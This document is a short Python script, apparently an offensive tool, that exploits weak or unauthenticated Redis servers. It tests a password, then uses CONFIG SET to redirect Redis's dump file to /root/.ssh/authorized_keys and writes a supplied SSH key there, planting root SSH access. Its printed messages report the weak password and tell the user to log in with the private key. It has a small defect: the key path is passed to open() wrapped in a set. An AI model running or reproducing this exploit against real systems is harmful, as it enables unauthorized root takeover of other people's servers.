#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""  
@Project : pythonProject
@File : redis_exp.py
@Author : 万能小魏
@Time : 2024-09-23 10:17  
@脚本说明 : 

"""
import threading

from redis import Redis


def san_redis(host, port, password,id_rsa):
    try:
        redis_cli = Redis(
            host=host,
            port=port,
            password=password,
            db=0,
            encoding="utf-8",
            socket_timeout=3,
            socket_connect_timeout=3
        )
        redis_cli.set("aa", "bb")
        result = redis_cli.get("aa")
        if result:
            print(f"[+] 存在弱口令：{host}:{port} - {password}")
            print("可以进一步利用未授权访问漏洞利用ing...")
            if id_rsa:
                try:
                    redis_cli.config_set("dir", "/root/.ssh")
                    redis_cli.config_set("dbfilename", "authorized_keys")
                    with open(file={id_rsa}, mode="r", encoding="utf-8") as f:
                        redis_cli.set("hacker", "\n\n " + f.read() + " \n\n")
                        redis_cli.save()
                        print("[+] 未授权访漏洞利用成功,请使用私钥连接~")
                except:
                    print("[-] 未授权访问漏洞利用失败")
            else:
                print("[-] 未找到私钥,未授权访问漏洞停止")
    except:
        pass